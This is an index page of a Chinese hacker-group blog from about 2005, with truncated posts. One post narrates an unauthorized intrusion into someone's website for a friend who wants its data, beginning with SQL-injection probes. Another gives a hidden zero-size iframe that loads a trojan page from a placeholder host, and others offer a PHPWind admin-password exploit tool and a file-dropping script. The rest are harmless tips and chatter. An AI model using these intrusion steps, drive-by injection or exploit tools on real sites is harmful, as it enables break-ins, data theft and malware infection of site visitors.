万网:我进来玩过两次了

文章作者:Andyower 天使娃娃
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)

注:本文已发表2005年9月的黑客防线.如有转载,请注名

近日,朋友说要我帮他弄一个站点,说那个站点有许多他想要的资料,他给出了站点www.***d.com,由于一些原因,所以本文有很多的截图都不能提供,希望大家可以谅解.

第一次渗透
先从主站入手,登陆上去看看,主站上面几乎都是静态的,只有一些新闻,而那些新闻是的注入点是连接到另外的一个IP,220.194.*.*/news.asp?id=111,试一下提交and 1=1,and 1=2,还有"news.asp?id=1'11","news.asp?id=11;1","news.asp?id=11 1","news.asp?id=11–1",全部返回正常,也就是说"'",";","–"," 阅读全文 »

Tags:

多姿多彩的挂马方式

ps:后来更新的
一、最简单的也是最有效的

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

阅读全文 »

Tags:

CMD环境下可以用Tab协助切换目录

在XP的CMD环境下,按TAB键可以将目录项目一个一个的列出来

比如你切换到某一个目录下,命令是这样打的:
cd<空格>目录名

但是这时你把目录名字忘了,但是如果看到的话,你会认出来,或者目录名太长,懒得打。
这时你可以按TAB键,一个一个选择目录,这个目录不是的话,就再按下TAB键,直到找到你要的那个目录为止,然后回车就可以切换到你要的目录下了。当然,如果只是列目录的话,还是dir方便。不过有一点,dir看不到隐藏的目录,但是上面说的方法可以看到隐藏的目录,可以直接切换到隐藏的目录下。
同时也支持Shift+TAB来反向切换。
在XP下测试成功,2000和2003没有测试,不我想应该也可以的。

Tags: ,

画出你的抓图区域

今天在postshow上看到一个这样的工具,觉得不错,就写上了,我又加了一些说明。

NamoCapture都差不多,各有各的好处,NamoCapture在这方面做的比较好,根据情况决定用哪个吧。

来源:postshow

她们怎么了?

今天又看到一个叫做木木的blog,名字就叫做木木:一个视频舞女的身体日记,就想,中国出了多少个这样的人了?

我们来数一下:
木子美竹影青瞳流氓燕红衣教主芙蓉姐姐,加上一个名为“我们的性福”的blog,另外还有木木:一个视频舞女的身体日记.

个,她们都是女性,而且她们无一例外都是以网络博客的出位写作出名,她们都有一个共同的主题,那就是"性".

关于她们的介绍,我想我就不用废话了,经常上网的人都应该多少了解一些,即使不知道的,baidu,google一搜一大把.真不知道她们怎么想的,这样做有意义吗?就为了出名?按她们的说法,她们并不是为了出名才这样做的,但是我想,不管是不是,多多少少也包含一些这样的因素吧.也不明白为什么就还有那么多人喜欢她们,我是不明白..
阅读全文 »

服务器终于好了

一直以来,每天早上起床后打开电脑,登陆QQ和GT.然后打开小组的站,登陆后台,更新文章上去,然后到论坛回回帖子.再打开自己的blog,回复下留言,然后就看看我订阅的RSS.
这已经成了一种习惯了,但是前两天小组的服务器出了点问题,一直无法访问,老大忙前忙后的维护.
结果这两天早上起床之后,小组的站,论坛,我的blog都无法访问,心里很不舒服,有种失落感…

现在终于好了,一切都恢复正常了.

PHPWINDBLOG修改管理员密码漏洞利用工具

我就不写使用说明了,很简单,看下工具就明白了.

来源:[Bug.Center.Team-漏洞预警中心小组]

点击下载

file2php

作者:Saiy 来源:浅蓝的辐射区

写了一个简单的代码,按shell哥的意思的。
只是把文件“变成”php代码。必将的时候可以直接写到php….
里到服务器再把文件释放到某目录下。
代码没写得很清晰,其实很简单,有需要的可以改改也可以自己写。
阅读全文 »